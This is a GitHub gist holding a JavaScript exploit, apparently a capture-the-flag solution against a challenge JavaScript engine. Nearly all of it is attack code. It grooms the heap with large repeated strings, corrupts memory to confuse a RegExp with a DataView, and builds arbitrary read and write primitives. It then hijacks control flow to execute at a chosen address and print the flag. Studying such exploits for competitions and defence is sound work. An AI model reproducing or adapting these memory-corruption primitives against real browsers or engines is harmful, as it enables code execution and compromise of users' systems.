Created
July 22, 2020 17:09
-
-
Save YiChenChai/29bbc3545d86355222b4d525cb34e887 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| String.prototype.repeat=function(count){var str=''+this;count=+count;count=Math.floor(count);var maxCount=str.length*count;count=Math.floor(Math.log(count)/Math.log(2));while(count){str+=str;count--;} | |
| str+=str.substring(0,maxCount-str.length);return str;} | |
| zzzaa = []; | |
| zzzcb1 = new DataView(141); | |
| zzzcb2 = new Number(1337); | |
| zzzcc1 = []; zzzcc2 = []; zzzcc3 = []; zzzcc4 = []; zzzcc5 = []; zzzcc6 = []; | |
| var zzzbb1 = "A".repeat(65534); | |
| var zzzbb2 = "\x11".repeat(64); //64 | |
| // 65535 + seplen _+ str1len | |
| var zzzbb3 = [zzzbb1, zzzbb2]; | |
| // 511 -> 0x7ffff6683e80 | |
| // 510 -> 0x7ffff6683f80 | |
| // var lmao = hold[256]; | |
| // var8 = []; | |
| zzzbb4 = []; | |
| delete zzzcc2; delete zzzcc1; | |
| delete zzzbb4; | |
| zzzbb5 = new RegExp(zzzbb2);//new DataView(0x100); | |
| // print(zzzbb5); | |
| zzzbb3.join(); | |
| // // var1.prototype = Number.prototype; | |
| get8 = DataView.prototype.getUint8.bind(zzzbb5); | |
| set8 = DataView.prototype.setUint8.bind(zzzbb5); | |
| get32 = DataView.prototype.getUint32.bind(zzzbb5); | |
| set32 = DataView.prototype.setUint32.bind(zzzbb5); | |
| function read32(address) { | |
| bottom = address & 0xffffffff; | |
| if (bottom < 0) bottom += 0x100000000; | |
| oldl = get32(0x280 + 0x28); | |
| oldh = get32(0x280 + 0x2c); | |
| set32(0x280 + 0x28, bottom); | |
| address -= bottom; | |
| address /= 0x100000000; | |
| set32(0x280 + 0x2c, address & 0xffffffff); | |
| val = zzzcb1.getUint32(0); | |
| set32(0x280 + 0x28, oldl); | |
| set32(0x280 + 0x2c, oldh); | |
| return val; | |
| } | |
| function write32(address, value) { | |
| bottom = address & 0xffffffff; | |
| if (bottom < 0) bottom += 0x100000000; | |
| oldl = get32(0x280 + 0x28); | |
| oldh = get32(0x280 + 0x2c); | |
| set32(0x280 + 0x28, bottom); | |
| address -= bottom; | |
| address /= 0x100000000; | |
| set32(0x280 + 0x2c, address & 0xffffffff); | |
| val = zzzcb1.setUint32(0, value); | |
| set32(0x280 + 0x28, oldl); | |
| set32(0x280 + 0x2c, oldh); | |
| return val; | |
| } | |
| function execute(address) { | |
| set8(0x180, 16); | |
| bottom = address & 0xffffffff; | |
| if (bottom < 0) bottom += 0x100000000; | |
| set32(0x180 + 0x38, bottom); | |
| address -= bottom; | |
| address /= 0x100000000; | |
| set32(0x180 + 0x3c, address & 0xffffffff); | |
| zzzcb2.a = 1; | |
| } | |
| function main() { | |
| // print("hi"); | |
| // set8(0x480, 16); | |
| // print(Challenge.read()); | |
| // print(Challenge.write()); | |
| // print(Challenge.exec()); | |
| write32(Challenge.write(), read32(Challenge.read())); | |
| execute(Challenge.exec()); | |
| print(Challenge.getFlag()); | |
| } | |
| main(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment